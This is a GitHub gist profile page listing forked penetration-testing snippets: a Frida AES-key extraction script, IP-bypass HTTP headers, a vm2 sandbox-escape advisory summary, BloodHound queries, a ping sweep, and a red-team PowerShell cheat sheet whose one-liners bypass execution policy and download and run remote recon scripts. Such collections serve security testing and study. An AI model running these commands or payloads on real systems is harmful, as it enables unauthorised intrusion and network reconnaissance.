Skip to content

Instantly share code, notes, and snippets.

View Sorrashut-K's full-sized avatar

Sorrachat Sorrashut-K

1 follower · 1 following
View GitHub Profile
@Sorrashut-K
Sorrashut-K / frida-get-AES-keys
Created July 13, 2020 08:49 — forked from d3vilbug/frida-get-AES-keys
#!/usr/bin/env python3
from __future__ import print_function
import frida
import sys
import json
import time
def on_message(message, payload):
if(message['type'] == 'send'):
@Sorrashut-K
Sorrashut-K / gist:7df87514f8f1e4b79f45cd447f4c4284
Created May 30, 2023 03:55 — forked from kaimi-/gist:6b3c99538dce9e3d29ad647b325007c1
Possible IP Bypass HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
@Sorrashut-K
Sorrashut-K / vm2_3.9.16_sandbox_escape.md
Created November 5, 2023 02:34 — forked from leesh3288/vm2_3.9.16_sandbox_escape.md
Sandbox Escape in [email protected]

Sandbox Escape in [email protected]

Summary

There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException() which can be used to escape the sandbox and run arbitrary code in host context.

Proof of Concept

@Sorrashut-K
Sorrashut-K / RedTeam_CheatSheet.ps1
Created February 19, 2024 03:56 — forked from MHaggis/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@Sorrashut-K
Sorrashut-K / customqueries.json
Created February 28, 2024 08:11 — forked from seajaysec/customqueries.json
bloodhound custom queries
{
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
}]
},
{
"name": "List all owned computers",
@Sorrashut-K
Sorrashut-K / Get-PingSweep.ps1
Created May 27, 2024 15:52 — forked from joegasper/Get-PingSweep.ps1
Get-PingSweep - super fast (~500ms) subnet ping sweep with option to resolve IP address
# Inspiration from https://twitter.com/mrhvid/status/929717169130176512 @mrhvid @Lee_Holmes
function ResolveIp($IpAddress) {
try {
(Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost
} catch {
$null
}
}